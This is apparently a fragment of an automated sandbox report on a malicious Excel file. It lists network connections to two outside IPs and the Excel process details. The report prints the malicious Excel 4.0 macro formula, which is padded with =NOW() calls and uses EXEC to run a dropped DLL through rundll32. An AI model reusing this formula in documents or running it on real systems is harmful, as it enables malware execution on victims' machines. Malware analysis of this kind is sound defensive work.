"=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=EXEC(""rundll32 ""&""..\Hodas.vyur2""&"",DllRegisterServer"")=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()=NOW()"=HALT()

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Apr 14, 2021 11:23:04.168615103 CEST4916780192.168.2.2237.46.133.194
Apr 14, 2021 11:23:07.186959028 CEST4916780192.168.2.2237.46.133.194
Apr 14, 2021 11:23:13.193677902 CEST4916780192.168.2.2237.46.133.194
Apr 14, 2021 11:23:25.209192991 CEST4916880192.168.2.2237.46.133.194
Apr 14, 2021 11:23:28.217830896 CEST4916880192.168.2.2237.46.133.194
Apr 14, 2021 11:23:34.224195957 CEST4916880192.168.2.2237.46.133.194
Apr 14, 2021 11:23:46.285542965 CEST4916980192.168.2.22185.212.129.66
Apr 14, 2021 11:23:49.295207977 CEST4916980192.168.2.22185.212.129.66
Apr 14, 2021 11:23:55.301565886 CEST4916980192.168.2.22185.212.129.66

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

General

Start time:11:21:39
Start date:14/04/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13f3f0000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Reset < >